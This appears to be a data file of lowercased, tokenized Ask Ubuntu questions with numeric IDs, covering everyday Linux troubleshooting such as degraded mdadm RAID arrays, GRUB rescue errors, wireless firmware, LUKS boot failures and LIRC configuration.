dca 14728 1 igb ptp 18232 1 igb ahci 25631 3 pps_core 13736 1 ptp libahci 26336 1 ahci e1000e 181707 0
438715	problem with raid 1 drive /dev/sba which was part of /dev/md0 now degraded into /dev/md127	root @ bew : ~ # uname -a linux bew 3.5.0-23-generic # 35~precise1-ubuntu smp fri jan 25 17:15:33 utc 2013 i686 i686 i386 gnu/linux root @ bew : ~ # fdisk -l disk /dev/sda : 203.9 gb , 203928109056 bytes 255 heads , 63 sectors/track , 24792 cylinders , total 398297088 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a6462 device boot start end blocks id system /dev/sda1 * 2048 389302271 194650112 fd linux raid autodetect /dev/sda2 389304318 398295039 4495361 5 extended /dev/sda5 389304320 398295039 4495360 fd linux raid autodetect disk /dev/sdb : 203.9 gb , 203928109056 bytes 255 heads , 63 sectors/track , 24792 cylinders , total 398297088 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000cd49d device boot start end blocks id system /dev/sdb1 * 2048 389302271 194650112 fd linux raid autodetect /dev/sdb2 389304318 398295039 4495361 5 extended /dev/sdb5 389304320 398295039 4495360 fd linux raid autodetect disk /dev/md127 : 199.3 gb , 199321649152 bytes 255 heads , 63 sectors/track , 24232 cylinders , total 389300096 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000048ac device boot start end blocks id system /dev/md127p1 63 385110179 192555058+ 83 linux /dev/md127p2 385110180 389287079 2088450 5 extended /dev/md127p5 385110243 389287079 2088418+ 82 linux swap / solaris root @ bew : ~ # cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md127 : active raid1 sdb1 [ 1 ] 194650048 blocks [ 2/1 ] [ _u ] no array listed in /etc/mdadm/mdadm.conf automatically tag new arrays as belonging to the local system homehost < system > i deleted it hoping to rebuild . root @ bew : ~ # dmraid -dtay debug : not isw at 2064645120 debug : isw trying hard coded -2115 offset . debug : not isw at 2063563264 debug : not isw at 2064645120 debug : isw trying hard coded -2115 offset . debug : not isw at 2063563264 no raid disks root @ bew : ~ # mdadm -- create /dev/md0 -- name=0 -- chunk=256 -- level=1 -- raid-devices=2 /dev/sda1 /dev/sdb1 mdadm : /dev/sda1 appears to be part of a raid array : level=raid0 devices=0 ctime=wed dec 31 16:00:00 1969 mdadm : partition table exists on /dev/sda1 but will be lost or meaningless after creating array mdadm : note : this array has metadata at the start and may not be suitable as a boot device . if you plan to store '/boot ' on this device please ensure that your boot-loader understands md/v1.x metadata , or use -- metadata=0.90 mdadm : super1.x can not open /dev/sdb1 : device or resource busy mdadm : /dev/sdb1 is not suitable for this array . mdadm : create aborted root @ bew : ~ # mdadm -evvvvs mdadm : no md superblock detected on /dev/md127p5 . /dev/md127p2 : mbr magic : aa55 partition [ 0 ] : 4176837 sectors at 63 ( type 82 ) mdadm : no md superblock detected on /dev/md127p1 . /dev/md127 : mbr magic : aa55 partition [ 0 ] : 385110117 sectors at 63 ( type 83 ) partition [ 1 ] : 4176900 sectors at 385110180 ( type 05 ) mdadm : no md superblock detected on /dev/sdb5 . /dev/sdb2 : mbr magic : aa55 partition [ 0 ] : 8990720 sectors at 2 ( type fd ) /dev/sdb1 : magic : a92b4efc version : 0.90.00 uuid : 63621c2f:6fa023e2 : e368bf24 : bd0fce41 creation time : mon jan 23 14:19:49 2012 raid level : raid1 used dev size : 194650048 ( 185.63 gib 199.32 gb ) array size : 194650048 ( 185.63 gib 199.32 gb ) raid devices : 2 total devices : 1 preferred minor : 127 update time : mon mar 24 13:11:57 2014 state : clean active devices : 1 working devices : 1 failed devices : 0 spare devices : 0 checksum : cac6a6e5 - correct events : 1834362 number major minor raiddevice state this 1 8 17 1 active sync /dev/sdb1 0 0 0 0 0 removed 1 1 8 17 1 active sync /dev/sdb1 /dev/sdb : mbr magic : aa55 partition [ 0 ] : 389300224 sectors at 2048 ( type fd ) partition [ 1 ] : 8990722 sectors at 389304318 ( type 05 ) mdadm : no md superblock detected on /dev/sda5 . /dev/sda2 : mbr magic : aa55 partition [ 0 ] : 8990720 sectors at 2 ( type fd ) /dev/sda1 : mbr magic : aa55 partition [ 0 ] : 385110117 sectors at 63 ( type 83 ) partition [ 1 ] : 4176900 sectors at 385110180 ( type 05 ) /dev/sda : mbr magic : aa55 partition [ 0 ] : 389300224 sectors at 2048 ( type fd ) partition [ 1 ] : 8990722 sectors at 389304318 ( type 05 ) root @ bew : ~ # mdadm -- examine /dev/sdb /dev/sdb : mbr magic : aa55 partition [ 0 ] : 389300224 sectors at 2048 ( type fd ) partition [ 1 ] : 8990722 sectors at 389304318 ( type 05 ) root @ bew : ~ # root @ bew : ~ # mdadm -- examine /dev/sda /dev/sda : mbr magic : aa55 partition [ 0 ] : 389300224 sectors at 2048 ( type fd ) partition [ 1 ] : 8990722 sectors at 389304318 ( type 05 ) root @ bew : ~ # mdadm -- examine /dev/md0 mdadm : can not open /dev/md0 : no such file or directory root @ bew : ~ # mdadm -- examine /dev/md127 /dev/md127 : mbr magic : aa55 partition [ 0 ] : 385110117 sectors at 63 ( type 83 ) partition [ 1 ] : 4176900 sectors at 385110180 ( type 05 ) root @ bew : ~ # mdadm -- assemble -- run -- force /dev/md0 /dev/sda1 mdadm : can not assemble mbr metadata on /dev/sda1 mdadm : /dev/sda1 has no superblock - assembly aborted as you can see above it says there is a superblock and then here that there is n't . root @ bew : ~ # cat /proc/mdstat personalities personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md127 : active raid1 sdb1 [ 1 ] 194650048 blocks [ 2/1 ] [ _u ] unused devices : < none > cat : personalities : no such file or directory root @ bew : ~ # umount -- force /dev/md127p1 umount2 : device or resource busy umount : / : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) umount2 : device or resource busy i found the system off , having crashed over night , the only way it boots is if i use the boot in degraded after selecting recovery mode from boot menu . i will not boot into the desktop either . line command is all we got . i first only tried to rename the md127 back to md0 , but always came back with unable to gain exclusive access , then i tried to add , but always got the busy message . once i edited the adadm.conf with md0 instead of the md127 and then rebuilt the kernel , no help , still boots into md127 though the conf had md0 . at one point i received an error message that states that the magic is different and they are , though i do n't know how that happen , one is aa55 and the other is a mixed number and letter , that seems to be common in the forums i have visited . i have researched for days now with no luck , please i need help with this.. thanks .
438716	slow machine when waking from suspend	i am using xfce4-power-manager to take care of screen locking and suspend when i close the lid of my laptop . it 's a great little utility ! however , when the machine wakes from suspend ( which is to ram ) , it is very sluggish . e.g . typing in a terminal window will incur as much as a few seconds delay . this effectively makes suspend to ram useless on my machine : - ( i have the same problem if i manually use pm-suspend or pm-hibernate ( the latter also requiring to go through grub when it wakes up ) . is there something i 'm missing ?
438724	error while installing ubuntu on ibook g4 powerpc ( more info in post )	this is my first post . here are my computer specs : ibook g4 powerpc 512mb ram 150 gb harddrive blah blah blah anyway , i have been trying to install ubuntu 12.04 on this computer . i have the powerpc version of ubuntu on a dvd , and i can get to yaboot , or the boot.msg . i boot using live . it starts up , the disk in the drive whirs , and the `` ubuntu 12.04 '' message comes up with the little yellow/white loading thing below it . it then comes up with these exact messages : * stopping system v runlevel compatabilitylt/speech- [ ok ] c [ 104.378277 ] b43-phy0 error : firmware file `` b43/ucode5.fw '' not found [ ok ] [ 104.378488 ] b43-phy0 error : firmware file `` b43-open/ucode5.fw '' not found [ ok ] [ 104.378489 ] b43-phy0 error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for this driver version . please carefully read all instructions on this website . [ ok ] * starting configure network device security [ ok ] * starting configure virtual network devices [ ok ] * stopping configure virtual network devices [ ok ] * starting save udev log and update rules [ ok ] * stopping save udev log and update rules [ ok ]
438727	java web start not detected	i 'm trying to get oracle java web start running on google chrome . i followed this tutorial and i still ca n't get it working . i checked my plugins on both chrome and firefox and java does n't appear in the plugins for either of them . can someone help me get this working ? thanks !
438729	how to open application tab as default on unity dash ?	i hate it when the unity dash opens the home tab by default . i want to go to the application tab straight . also dash collapses the installed apps and expands the dash plugins . is it possible to open expanded application list when i click the ubuntu dash ? thank you .
438735	ubuntu installation issues	i have an old laptop running 2 sets of windows vista with 2 gigs of ram and an old intel processor . i 'm trying to install ubuntu 13.10 via cd but have tried usb it said no file errors and i can test ubuntu on the usb but when i choose install i press ok and it changes the cursor to the loading one but it seems to make no progress help ? p.s i 'm no computer expert so try to use nor complex jargon .
438738	make a disk sleep permanently	on my computer i have 3 hard disks with 3 different oses , but one of those disks it 's a little bit old and i want to make it sleep always , because it consumes power and makes noise , but i 'm not even using it ! i tried with the disk utility gui , but it does n't do anything . also tried with hdparm.conf , just by adding my device and `` sleep '' on a new entry , it works , it makes sleep the hard disk , but when ubuntu loads up , the disk wakes up again . can i make a `` permanent '' sleep only for this hard disk drive ? thanks .
438742	does mv ignore the letter case by default ?	i 'm trying to change only the case in the filename and getting the error : ayakovlev @ ubuntu : ~/host $ mv crc32.hpp crc32.hpp mv : ‘crc32.hpp’ and ‘crc32.hpp’ are the same file is it any setting somewhere which controls this mv behavior ? i do n't have any aliases for the mv . the mv version is below : ayakovlev @ ubuntu : ~/host $ mv -- version mv ( gnu coreutils ) 8.20 copyright ( c ) 2012 free software foundation , inc. license gplv3+ : gnu gpl version 3 or later < http : //gnu.org/licenses/gpl.html > . this is free software : you are free to change and redistribute it . there is no warranty , to the extent permitted by law . written by mike parker , david mackenzie , and jim meyering . ubuntu version is : ayakovlev @ ubuntu : ~/host $ uname -a linux ubuntu 3.11.10.3 # 1 smp thu mar 6 15:31:54 est 2014 x86_64 x86_64 x86_64 gnu/linux important update : note , that the crc32.hpp file resides on the host filesystem . the host is vmware fusion on macpro , and the ubuntu is a guest vm .
438745	need help properly setting up raid5 ( align then mount )	trying to â¨start overâ¨ and following this guide : http : //dennisfleurbaaij.blogspot.com/2013/01/setting-up-linux-mdadm-raid-array-with.html i used fdisk and mdadm to create a raid 5 , and i believe i should have used 4096 size . following those instructions i get : gnu parted 2.3 using /dev/md0 welcome to gnu parted ! type 'help ' to view a list of commands . ( parted ) mklabel gpt warning : the existing disk label on /dev/md0 will be destroyed and all data on this disk will be lost . do you want to continue ? yes/no ? yes ( parted ) unit s ( parted ) mkpart primary 2048s 100 % warning : the resulting partition is not properly aligned for best performance . ignore/cancel ? i stopped at that point because i need to realign . here is fdisk info : disk /dev/md0 : 3000.2 gb , 3000211537920 bytes 255 heads , 63 sectors/track , 364754 cylinders , total 5859788160 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 65536 bytes / 196608 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/md0p1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . my goal is to set this drive up right , and mount it so i know that i can start transferring files that i plan to store . i set up the raid and let it build before , then used samba to set up a share . i transferred files with my windows machine over . i turned everything off and the network link was no longer valid in windows . that is when i backtracked and started getting alignment errors . this is my first server , btw . trying to get this drive shared permanently each time i boot/reboot . -- -- -- - edit -- -- -- -- -- -- -- - so i am still confused if i have selected the correct size for my array . also , i have tried to add to fstab but i am not sure what ( options ) to use .
438746	luks and lvm install : no boot ( gave up waiting for root device )	i just finished installing 12.04 on my system , configuring it with luks and lvm . i can open the encrypted position just fine in a recovery disk , but i just ca n't seem to get it to boot . it waits quite a while for the root partition , then explodes with errors on how it could n't find the root device : alert ! /dev/mapper/vgcryptotop-lvcryptotoproot does not exist . dropping to a shell ! i then get the initramfs prompt . i have tried running cryptsetup to open the disk from here , but it replies that cryptsetup is n't found by the shell . i think that somehow , the os was installed without luks and/or lvm . how do i fix this problem ? how can i test my theory ?
438747	auto indentation not working in code-blocks 13.12 ( svn 9636 )	i am using 12.04 lts and for that reason i am not being able to install the latest packages of code-blocks 13.12 directly which we get directly from code-blocks website . so , i had to use the alternative and get it from here . the installation went perfectly and code-blocks runs perfectly . but with a small defect . it does n't auto indent . if i press { , then a structure like this is expected . { //code here } but this is not happening . what i should do ? auto indent is necessary for me . i confirm i have checked settings- > editor- > general setting- > auto indent , and it is properly checked . so , the auto indent feature is in activated form .
438750	migrating from wamp to ubuntu desktop	i am moving my wordpress site from a wamp stack on win7 to ubuntu desktop 13.10 . upon export i realized that all the tables had been written as innodb rather than myisam , so i did a find/replace to correct that . is there anything that i should look at as far as incompatibilities between wamp and a lamp stack ? i 'm getting this error : warning : mysql_connect ( ) : ca n't connect to mysql server on 'x.x.x.x ' ( 111 ) in /var/www/wp-includes/wp-db.php on line 1147 line 1147 : $ this- > dbh = mysql_connect ( $ this- > dbhost , $ this- > dbuser , $ this- > dbpassword , $ new_link , $ client_flags ) ; my process was : create a database with the same name as the original db . import the .sql file that was exported from the old wamp server into this new db ( again , had to change the innodb to myisam create a db user with the same name and pw as the orig db copy all the contents from my wordpress site into /var/www open a browser and point to http : //x.x.x.x/wordpress ( both the ip and 'localhost ' ) give the same error , but i built my site using the ip rather than 'localhost' test going to just http : //x.x.x.x and i get the `` it works ! '' page . i was able to start a new wordpress site from scratch , so i 'm pretty confident my setup is fine with respect to the lamp stack . i just do n't know where to look any more . any thoughts would be greatly appreciated .
438751	press s to skip mounting ?	i installed ubuntu 12.04 alongside windows 7 ( on one hdd ) . every time i boot into ubuntu i get a message saying `` press s to skip or m for manual mount '' . when i go back to windows i get a similar message . both windows and ubuntu work perfectly fine if i just skip the message . i tried ubuntu because it seemed to be a safer os . am i having this issue because i have a dual boot system on one hdd , or is it something else ? keep in mind i am new to linux .
438753	how to disable networking from command line without sudo ?	i want to disable networking from a bash script while not giving it administrative privileges . it 's possible from gui . is there a way to do it from cli ?
438754	lirc as ir blaster - problem with repeated commands	i have succesfully setup lirc to work as an ir blaster for my nad amplifier , which uses nec codes . however i have a problem with repeating codes , e.g . sending volume up 20 times . i know my remote sends the key code only once and then sends 0xffffffff repeatedly until the key is released . how do i configure lirc to support this ? my config : begin remote name nad bits 32 flags space_enc|const_length eps 30 aeps 100 header 8943 4463 one 552 1674 zero 552 575 ptrail 554 repeat 8938 2246 gap 107319 toggle_bit_mask 0x0 begin codes key_power 0xe13ea45b key_power2 0xe13e13ec key_volumedown 0xe13e31ce key_volumeup 0xe13e11ee key_cd 0xe13ea15e key_aux 0xe13ed926 key_video 0xe13e43bc key_mp3 0xe13e916e key_tape 0xe13eb14e key_tuner 0xe13ebb44 key_vendor 0xe13e8976 key_time 0xe13eb748 key_sleep 0xe13e04fb key_displaytoggle 0xe13e1ce3 key_record 0xe13ef708 key_1 0xe13e30cf key_2 0xe13eb04f key_3 0xe13e708f key_4 0xe13ef00f key_5 0xe13e08f7 key_6 0xe13e8877 key_7 0xe13e48b7 key_8 0xe13ec837 key_9 0xe13ea857 key_0 0xe13e6897 key_channeldown 0x61f0ec13 key_channelup 0x61f06c93 key_brightness_cycle 0xe13e1ce3 key_mute 0xe13e29d6 end codes end remote
438755	is it possible to completely disable video output ?	i have a small computer running 12.04 . i only control this computer remotely ( usually with teamviewer , i also use ssh occasionally ) . i want to completely disable the hdmi video output so the desktop can only be viewed remotely . i will be sending this computer to people , and i do n't want them to be able to plug it into a monitor and steal my source code . is this possible ? thanks !
438756	using dkim in my server for multiple domains ( websites )	i 've read the tutorial posted by mountainx ( setup dkim ( domainkeys ) for ubuntu , postfix and mailman ) , but i ca n't figure out how to apply this steps if i want to host and send e-mails for several domains . does anybody have a clue ?
438759	ubuntu apparently does n't recognize wireless adapter	i want to install ubuntu 13.10 on an older acer laptop . i 'm running the live cd , and ubuntu does n't recognize the broadcom 802.11g wireless adapter . windows vista connects no problem . i 'm a newbie , and compiling the code provided by broadcom for a new driver does n't appeal . any easier fixes available ?
438760	can curl localhost , but ca n't access port 80 from lan	i ca n't find an answer to this question anywhere . i have ssh access set up , and can tunnel into my server . when on the server , i can curl localhost and get a response : curl localhost however , when i attempt to access port 80 on my lan , i get no response . i have edited iptables to show : chain input ( policy accept ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : http chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : http any help would be appreciated .
438762	error : no such partition entering rescue mode ... grub rescue >	i am using windows 8.1 and ubuntu 13.10 as in dual boot . i have changed my disk size using disk management in windows 8.1 -- specifically i have clubbed another partition into local disc c in windows . i have n't touched ubuntu partition at all . once i restarted the system , i am getting error : no such partition entering rescue mode ... grub rescue > i tried methods mentioned in different forms like ubuntu live usb , placing windows cd in optical drive , nothing is happening . just getting the error message . i tried to use f11 button but nothing happens . is there anything i can do to solve the problem ? i am not much of software techie , but i can follow steps to solve the problem . thanks
438767	how do i open downloaded ubuntu file ?	when i try to open ubuntu downloaded file , windows asks for name of program that created the file . what is the answer ?
438772	external links to youtube result in `` video currently unavailable '' in chromium	btw i do n't consider this a duplicate as i am strictly speaking not troubleshooting codecs . i have no problem playing you tube videos , if they are started from within the youtube website . ubuntu 12.04 lts linux xxxx 3.8.0-35-generic # 52~precise1-ubuntu smp thu jan 30 17:24:40 utc 2014 x86_64 x86_64 x86_64 gnu/linux consistently , if i copy a link to a youtube clip from any source , say pidgin , and paste & go said link into chromium , it results in `` this video is currently unavailable '' . if i go to the same video after searching for it from youtube , still in chromium , video runs just fine . this would imply it has nothing to do with flash/html5/chromium-codecs-ffmpeg . videos work fine if i start them from the youtube site . videos fail if i paste & go copied links . in fact , if i pick a random video which is playing . copy the url . open a new tab and paste & go , it results in the `` this video is currently unavailable '' message . so far , no explicit question in here , so i guess i should ask one . where would i even begin troubleshooting this ? asked to edit my `` question '' with what i 've done to ts from thread youtube says `` this video is currently unavailable '' i have tried uninstalling and reinstalling chromium-codecs-ffmpeg , as well as the -extra variant . http : //www.youtube.com/html5 claims i am using the default player and presents me the option to try html5 . this would imply i am not using html5 . i have cleared cookies . once i realized chromium has no problems with playing any video if i start it from a link within the youtube site , i really stopped troubleshooting the actual player . i can play any video , i just have to start it from within the youtube page . it is when i paste & go from a copied link that it always results in the error message . i have not tried a proxy . i can do that later and update . proxying makes no difference .
438776	trouble installing ubuntu on an old pc with usb stick	so far i have : downloaded ubuntu 12.04.4 lts from the site . converted the iso file to img . ( i used unetbootin , i 'm not completely sure i did this right . ) i selected disk image , iso , and browsed to find my ubuntu iso file . i saved it to a 4 gb flash drive . i put the flash drive in my parents ' old hp pavilion . i rebooted , and hit escape to get to the boot menu . i could see my flash drive as an option . i selected it and hit enter . -- and then windows xp just starts up like always. -- even though i select my flash drive from the boot menu , windows xp loads up . i 'm not a computer wiz , and this is my first attempt to play around with linux . i heard using a cd is easier , but the cd drive on this pc is toast . anyone see what i 'm doing wrong ? let me know if you need more info . thanks , george
438777	searching for file contents on whole disk	i am trying to find my old ip address in config files in order to replace it by my new ip address . i found one answer that proposes the command sudo grep -hrnf '1.2.3.4 ' / to find those ip addresses . however , using this command directly , grep seems to hang . before it hangs , it outputs some warnings that it can not access some files inside /proc . therefore i changed the command to sudo grep -hrnfi -- devices=skip '1.2.3.4 ' / > oldips.txt but this time it wrote a 29 gb text file until i pressed ctrl+c . after that i excluded the /proc directory like this : sudo grep -hrnfi -- devices=skip -- exclude-dir=/proc '1.2.3.4 ' / > oldips.txt is this a good way to find an ip address ( or text in general ) on the whole disk ? if not , how would i need to change the command ?
438778	install pynsource in ubuntu 12.04	how can i install pynsource in ubuntu 12.04 lts ( the python version is 2.7 )
438783	how to switch to a command-line console in order to run the commands in low graphics mode ?	i have just upgraded my system but it boots to low graphics mode by default . i have seen questions on how to solve this problem and they all suggest to run a couple of commands from a command-line interface . but there is n't any command-line console by default in low graphics mode and hence , i can not run those commands . and , the answers i saw to solve the problem does n't explain this situation either . how to switch to a command-line console in order to run the commands in low graphics mode ?
438795	can i decrypt my hard drive from the grub command line ?	i recently installed ubuntu 13.10 onto a pc , and ticked the 'encrypt my drive ' option during setup . now i ca n't enter my encryption key on pc startup . i can use the keyboard to control the bios , and to control grub , but not to enter an encryption key . looking around , i see others online with the same issue , but the solutions seem to revolve around using a ps/2 keyboard ( i do n't have any ps/2 ports on my machine ) and then making a few changes once you are logged in ( i ca n't get in ) . what can i do here ? could i use the grub command line to decrypt the drive ? thanks
438796	inserting headphones does n't mute speakers	i 've installed ubuntu 12.04 on an old macbook pro of mine . everything worked quite well except for sound -- there was none ( actually there was -- you could just barely hear it ) . i fixed that by putting options snd-hda-intel model=macbook-pro-v1 at the end of alsa-base.conf ( yeah ... old macbook ) . however , i still have one issue , and that 's this : when i plug my headphones in , my speakers are still playing . i opened up alsamixer to debug this further , and noticed something interesting . plugging my headphones in does indeed mute the `` speaker '' line , but my actual speakers are still playing . i played with the volume of the individual items , and the only one that actually adjusted my real speakers at all was the pcm item ( well , and master ) . why is my speaker mapped to pcm ? how do i fix this ?
438800	help debugging string descriptor 0 read error on boot	i 've installed ubuntu 14.04 on my acer aspire v5 laptop . i would like some help debugging a boot error . what information should i provide when asking questions ? how do i isolate and diagnose a problem ? i 've been reading everything i can find on this and i 'm still having trouble understanding what to do . i think i need my hand held , lol . thanks for anyone 's input in advance ! on boot i see this error : usb 1-1.4 : string descriptor 0 read error : -22 i 'm just learning about debugging and got this info using the command dmesg | grep -i usb thought maybe it would help . aaron @ aaron-aspire-v5-571p : ~ $ dmesg | grep -i usb [ 0.246517 ] acpi : bus type usb registered [ 0.246536 ] usbcore : registered new interface driver usbfs [ 0.246545 ] usbcore : registered new interface driver hub [ 0.246570 ] usbcore : registered new device driver usb [ 0.956178 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 0.956335 ] ehci-pci 0000:00:1a.0 : new usb bus registered , assigned bus number 1 [ 0.970701 ] ehci-pci 0000:00:1a.0 : usb 2.0 started , ehci 1.00 [ 0.970753 ] usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 [ 0.970756 ] usb usb1 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.970759 ] usb usb1 : product : ehci host controller [ 0.970761 ] usb usb1 : manufacturer : linux 3.13.0-19-generic ehci_hcd [ 0.970763 ] usb usb1 : serialnumber : 0000:00:1a.0 [ 0.970900 ] hub 1-0:1.0 : usb hub found [ 0.971157 ] ehci-pci 0000:00:1d.0 : new usb bus registered , assigned bus number 2 [ 0.986710 ] ehci-pci 0000:00:1d.0 : usb 2.0 started , ehci 1.00 [ 0.986769 ] usb usb2 : new usb device found , idvendor=1d6b , idproduct=0002 [ 0.986772 ] usb usb2 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.986775 ] usb usb2 : product : ehci host controller [ 0.986777 ] usb usb2 : manufacturer : linux 3.13.0-19-generic ehci_hcd [ 0.986779 ] usb usb2 : serialnumber : 0000:00:1d.0 [ 0.986918 ] hub 2-0:1.0 : usb hub found [ 0.987075 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 0.987094 ] uhci_hcd : usb universal host controller interface driver [ 0.987244 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 3 [ 0.987460 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0002 [ 0.987462 ] usb usb3 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.987465 ] usb usb3 : product : xhci host controller [ 0.987467 ] usb usb3 : manufacturer : linux 3.13.0-19-generic xhci_hcd [ 0.987469 ] usb usb3 : serialnumber : 0000:00:14.0 [ 0.987599 ] hub 3-0:1.0 : usb hub found [ 0.987994 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 4 [ 0.988038 ] usb usb4 : new usb device found , idvendor=1d6b , idproduct=0003 [ 0.988041 ] usb usb4 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.988043 ] usb usb4 : product : xhci host controller [ 0.988045 ] usb usb4 : manufacturer : linux 3.13.0-19-generic xhci_hcd [ 0.988047 ] usb usb4 : serialnumber : 0000:00:14.0 [ 0.988166 ] hub 4-0:1.0 : usb hub found [ 1.282740 ] usb 1-1 : new high-speed usb device number 2 using ehci-pci [ 1.415169 ] usb 1-1 : new usb device found , idvendor=8087 , idproduct=0024 [ 1.415172 ] usb 1-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.415488 ] hub 1-1:1.0 : usb hub found [ 1.526652 ] usb 2-1 : new high-speed usb device number 2 using ehci-pci [ 1.659037 ] usb 2-1 : new usb device found , idvendor=8087 , idproduct=0024 [ 1.659048 ] usb 2-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.659546 ] hub 2-1:1.0 : usb hub found [ 1.826568 ] usb 3-3 : new full-speed usb device number 2 using xhci_hcd [ 1.844585 ] usb 3-3 : new usb device found , idvendor=04f3 , idproduct=0023 [ 1.844597 ] usb 3-3 : new usb device strings : mfr=4 , product=14 , serialnumber=0 [ 1.844603 ] usb 3-3 : product : touchscreen [ 1.844609 ] usb 3-3 : manufacturer : elan [ 1.844743 ] usb 3-3 : ep 0x2 - rounding interval to 64 microframes , ep desc says 80 microframes [ 1.861421 ] usbcore : registered new interface driver usbhid [ 1.861422 ] usbhid : usb hid core driver [ 2.010498 ] usb 3-4 : new high-speed usb device number 3 using xhci_hcd [ 2.072248 ] usb 3-4 : new usb device found , idvendor=04f2 , idproduct=b336 [ 2.072251 ] usb 3-4 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 2.072254 ] usb 3-4 : product : hd webcam [ 2.072256 ] usb 3-4 : manufacturer : hd webcam [ 2.146512 ] usb 1-1.4 : new full-speed usb device number 3 using ehci-pci [ 2.240581 ] usb 1-1.4 : string descriptor 0 read error : -22 [ 2.240596 ] usb 1-1.4 : new usb device found , idvendor=0489 , idproduct=e04e [ 2.240602 ] usb 1-1.4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 10.551060 ] usbcore : registered new interface driver btusb [ 10.819052 ] input : elan touchscreen as /devices/pci0000:00/0000:00:14.0/usb3/3-3/3-3:1.0/input/input8 [ 10.820994 ] hid-multitouch 0003:04f3:0023.0001 : input , hiddev0 , hidraw0 : usb hid v1.10 device [ elan touchscreen ] on usb-0000:00:14.0-3/input0 [ 10.842099 ] input : hd webcam as /devices/pci0000:00/0000:00:14.0/usb3/3-4/3-4:1.0/input/input10 [ 10.842194 ] usbcore : registered new interface driver uvcvideo [ 10.842195 ] usb video class driver ( 1.1.1 ) [ 10.852523 ] usbcore : registered new interface driver ath3k [ 10.942457 ] usb 1-1.4 : usb disconnect , device number 3 [ 11.139676 ] usb 1-1.4 : new full-speed usb device number 4 using ehci-pci [ 11.233491 ] usb 1-1.4 : string descriptor 0 read error : -22 [ 11.233501 ] usb 1-1.4 : new usb device found , idvendor=0489 , idproduct=e04e [ 11.233504 ] usb 1-1.4 : new usb device strings : mfr=1 , product=2 , serialnumber=3
438801	how is my touchscreen working ? can you tell me ?	i have a dell 15r xps . dual boot windows 8 and ubuntu 13.10 . touchscreen works awesome in windows 8 . never worked in ubuntu and i did n't expect it ever would . one day i happen to touch the screen and i have touch capability in ubuntu . not all the time , but most boot ups has me with touch . what do i need to show you , for you to tell me what is driving my touchscreen ? ie what would i install to get it to work next time i need to install ?
438802	can not display this video mode ?	display says `` can not display this video mode '' , then goes to login screen . mouse and keyboard stop working then display goes to blank purple screen . ubuntu 12.04 installed , was able to login once , hitting tab . not able to bring up grub screen . tried removing nvidia video drivers and installing new drivers . hp pavilion slimline amd 64 live , obviously very new to linux and i 'm trying to convert computer from windows xp . tried the following : display works fine in livecd but not in full installation ubuntu 12.04 blank purple splash screen after live install my computer boots to a black screen , what options do i have to fix it ?
438808	viber icon missing on panel	i 'm using ubuntu 12.04 and i 've installed viber and i 'm struggling for days with this problem . my viber icon is located at the top left corner , few milimeters to the right from the dash icon . i have tried to whitelist it on desktop enviroment variables , it wroked with skype , but not with viber . please help .
438810	unable to install grub/efi for lubuntu	i 'm trying to install lubuntu 13.10 x86-64 on my laptop , but it 's not working . lubuntu itself installs fine , but at then end when it tries to install grub it fails and does n't write anything to the uefi partition . i 'm attempting to install lubuntu onto an sdhc card and specified that the internal hard drive 's uefi partition should be used . i 've received the same result twice . details : internal 1tb sata hard drive running windows 8 . it 's partitioned in gpt and has 4 partitions . 1=uefi 2=windows 8 3=data 4=data sdhc 32gb for lubuntu 13.10 . it 's partition in gpt and has 2 partitions . 1=uefi ( but i 've deleted this so currently it 's unformatted empty space ) , 2=lubuntu secure boot is disabled otherwise the lubuntu disc is rejected as insecure , which is weird since secure boot support was added to ubuntu back in 12.04.2-ish . edit : i believe the error message was `` failed to install grub-efi to /target/ ''
438812	window chrome disappears and reappears causing jumpy windows	i 'm running ubuntu 13.10 in virtualbox . the host machine is running windows 7 with an ati radeon hd 5570 video card , 12 gb of memory , 2 quad core i7 cpus . i 've given the virtual machine 4gb of memory , 128 mb of video memory , 1 cpu , and checked the 3d acceleration box in virtualbox ( without 3d checked everything runs like molasses in the winter time ) . every 5 or 10 minutes some of my windows start flipping between a chrome state ( the title bar is visible ) to a no chrome state ( the title bar disappears ) which makes the windows jump up and down . this happens with chrome , firefox , and sublime which are pretty much the only apps i use on this box . for chrome and firefox , if i delete the user preferences folder then it temporarily seems to fix things . but now it started with sublime and i have n't found a good fix yet which means i ca n't currently do any work . here is a .gif of the problem : why is this happening and what do i need to do to permanently fix it ?
